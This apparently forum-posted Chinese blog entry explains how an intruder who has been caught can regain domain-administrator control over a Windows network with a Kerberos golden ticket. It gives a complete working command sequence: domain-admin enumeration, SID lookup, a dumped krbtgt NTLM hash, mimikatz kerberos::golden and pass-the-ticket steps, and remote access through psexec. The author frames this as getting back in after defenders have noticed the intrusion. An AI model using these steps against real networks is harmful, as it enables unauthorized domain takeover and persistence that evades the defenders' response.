最近幾年很少搞內網滲透了,這幾年發展的快啊,看了A牛翻譯的<<Fireeye Mandiant 2014 安全報告 Part1>> ,發現趨勢都是powershell腳本化了。想當年遇到的域控都是windows 2003的,找朋友要些vbscript腳本自動化,然后那啥那啥的。現在搞域除了前段時間出的MS14068,還有龍哥翻譯的(http://drops.wooyun.org/papers/576),不知道還有什么新方法,心中還有激情,如果想交流的朋友,可以加我聊聊。
我原來發過一個微薄說
這就是我說的金之鑰匙,利用這個的條件是你在原來搞定域控的時候,已經導出過域用戶的HASH,尤其是krbtgt 這個用戶的。但是在你在內網干其他事情的時候,活兒不細,被人家發現了,你擁有的域管理員權限掉了,你現在還有一個普通的域用戶權限,管理員做加固的時候又忘記修改krbtgt密碼了(很常見),我們還是能重新回來,步驟如下:
要重新拿回域管理員權限,首先要先知道域內的管理員有誰
C:\Users\hydra>net group "domain admins" /domain
我這里的實驗環境,通過截圖可以看到域管理員是administrator
我還要知道域SID是啥
C:\Users\hydra>whoami /user
我的域SID是 S-1-5-21-3883552807-251258116-2724407435
還有最重要的krbtgt用戶的ntlm哈希,我原來導出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::
然后該用神器mimikatz出場了,依次執行
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
到現在,我們又重新擁有域管理員權限了,可以驗證下
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
呃,感覺這個方法比http://drops.wooyun.org/tips/9297這個方便些,文章寫了好久了,一直湊不出更多的字數,就沒發。。嗯。。。懶了。。